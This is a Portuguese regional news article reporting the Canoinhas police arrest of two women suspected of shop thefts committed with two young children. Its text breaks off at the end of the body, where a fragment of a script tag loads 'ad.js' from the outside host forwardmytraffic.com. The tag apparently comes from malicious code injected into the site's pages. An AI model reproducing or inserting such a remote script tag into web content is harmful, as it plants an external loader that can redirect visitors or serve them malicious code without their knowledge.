InícioDestaquePM DE CANOINHAS: FLAGRANTE DE FURTO E CORRUPÇÃO DE MENORES

PM DE CANOINHAS: FLAGRANTE DE FURTO E CORRUPÇÃO DE MENORES

Últimas notícias

Penso, logo destino: Cerca de 886 pneus em desuso são recolhidos em Três Barras

O município de Três Barras realizou nesta quarta-feira, 24,...

Vítima de acidente para encima do teto do carro após colisão

Na tarde desta quarta-feira, 25, por volta das 16h30, ...

Na sexta-feira, 11, por volta das 15h40, equipes da PM de Canoinhas foram acionadas via Copom 190 para deslocar na Rua Gustavo Brandes, bairro Jardim Esperança no município de Canoinhas, para verificar um furto em estabelecimento comercial (loja).

 

 

No local, os policiais militares foram informados do furto praticado por duas femininas morenas, as quais usaram duas crianças para a prática do fato e fugiram com um veículo Fiat Palio de cor cinza escuro.

 

 

Durante lavratura do boletim no local, o Copom foi informado de um furto ocorrido em outra loja no Alto do Mussi, com as mesmas características. As equipes da PM efetuaram buscas, onde uma equipe PM logrou êxito na abordagem do veículo.

 

 

No interior do mesmo, estavam as duas femininas e duas crianças, sendo um menino de 4 anos e outro de 10 anos. Após buscas foram encontrados diversos objetos de furto, inclusive objetos de um furto ocorrido no dia anterior.

 

 

Diante dos fatos foi apreendido o veículo por infração de trânsito, acionado o Conselho Tutelar para as providências cabíveis, quanto aos menores, dado voz de prisão às femininas e conduzidas às mesmas até a Delegacia de Polícia Civil…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.